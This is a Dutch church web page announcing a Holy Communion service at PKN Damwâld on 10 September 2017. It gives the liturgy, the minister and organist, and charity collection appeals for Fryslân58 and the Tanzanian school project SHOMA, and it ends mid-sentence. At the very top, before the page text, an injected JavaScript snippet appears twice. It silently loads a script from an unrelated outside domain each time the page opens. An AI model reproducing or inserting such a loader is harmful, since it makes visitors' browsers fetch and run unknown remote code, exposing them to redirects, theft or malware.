;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kerkdienst zondag 10 september 2017 9:30 uur - PKN Damwâld
zondag 10 september 2017
09:30 uur
Viering Heilig Avondmaal

Kerkdienst zondag 10 september 2017 9:30 uur

Informatie

Voorganger:Ds. J.F. Kroon, Garijp
Organist:Ivo van Hijum
Mededeling:Viering Heilig Avondmaal
Liturgie
Lied voor de dienst Ps.139:1
Welkom en mededelingen
We zingen: Ps.139:2,14
Stil gebed, votum en groet .
Gebed .
We zingen: Ps.25:2
Kinderdienst
We lezen: Johanes 1:34-51
Collecte
We zingen: Gez.47:1,3
Preek
We zingen: Gez.463:3,4,5
Viering Heilig Avondmaal: lezen formulier
We zingen: Gez.360:1
Delen van brood en wijn
We zingen: Gez.358:1,4,5
Dankzegging .
Slotlied Gez.452:2
Zegen
Liturgie met de liedteksten is alleen beschikbaar met een Mijn Kerk account. Inloggen
Locatie: De Ikker Hearewei 1, Damwâld
Collecte informatie
Eerste collecte: St. Fryslân 58

De (stille) armoede in Nederland neemt snel toe. Naast ouderen, allochtonen en alleenstaande ouders kunnen ook steeds minder zelfstandige ondernemers de eindjes aan elkaar knopen. Juist nu het economisch slechter gaat en de sociale zekerheid steeds verder wordt uitgekleed, is het nu het moment om de krachten te bundelen en ons sterk te maken voor het terugdringen van armoede en sociale uitsluiting in onze eigen samenleving. Stichting Fryslân58 wil hier een bijdrage aan leveren door het verstrekken van huisraad, kleding en speelgoed aan mensen die dit zelf (tijdelijk) niet meer kunnen betalen. Stichting Fryslân58 stelt de goederen, tegen een geringe vergoeding, ter beschikking. Tevens voorkomen wij hiermee verspilling van goederen door die te hergebruiken. Wij kunnen echter alleen maar aanbieden wat we van u hebben ontvangen en vragen uw hulp voor deze doelgroep.

Tweede collecte: Kerk
Uitganscollecte: Avondmaalscollecte

Stichting onderwijsbevordering noordwest Tanzania-SHOMA Onderwijsvernieuwingsproject

12 jaar geleden is in Hoogeveen de stichting SHOMA opgericht. Dit woord betekent ‘onderwijs’ in het Kihaya, de voertaal in Rubya. Het doel van SHOMA is om in Rubya kansarme kinderen goed onderwijs te geven,waardoor ze zicht krijgen op een betere toekomst!! Rubya ligt ten N.O. van het Victoriameer in Tanzania. Het gebied kenmerkt door extreme armoede. Helaas zijn er veel weeskinderen, veroorzaakt door AIDS. De toegang tot gezondheidszorg is slecht. Zoals op zoveel plekken in de wereld waar armoede heerst , zijn kinderen als eerste de dupe. Officieel is scholing gratis in Rubya, maar door verplichte bijdragen voor lesmateriaal, schooluniformen en schoenen is het voor velen niet haalbaar. Shoma zamelt door allerlei acties geld in om in Rubya o.a. een school te bouwen. Vanuit Burgum hebben Klaas en Betsy Niestijl zich aangesloten bij SHOMA. Samen met vrijwilligers hier en in Tanzania zetten zij zich in voor een betere toekomst voor met name
weeskinderen. Alle acties, o.a. in Burgum e.o., hebben succes! Er gaan inmiddels 350 kinderen naar verschillende scholen in de regio, dankzij de hulp van donateurs. Omdat het onderwijs niet voldoende bleek om door te stromen naar vervolgonderwijs is besloten een school te bouwen, waar Engelstalig onderwijs wordt gegeven door goed opgeleide leerkrachten. Inmiddels is de school gedeeltelijk klaar en gaan er 55 kinderen, verdeeld over 3 groepen, naar KEMPS (Kishasha English Medium Primary School) Ieder schooljaar wordt er een lokaal afgewerkt en wordt er een klas toegevoegd. De leerlingen krijgen elke dag een maaltijd,die bereid wordt in een provisorische keuken. Op termijn hopen we een nieuwe keuken met eetzaal te kunnen bouwen. Op dit moment is een watervoorzieningsproject in voorbereiding, welke ook de bevolking van water voorziet. Shoma is intussen erkend door Wilde Ganzen, een enorme opsteker! Verder heeft zich spontaan een sponsor gemeld, die in juli 2018 tot
€ 15.000 euro wil doneren, wanneer wij hetzelfde bedrag bijeen brengen!! Wij doen ons best. Helpt u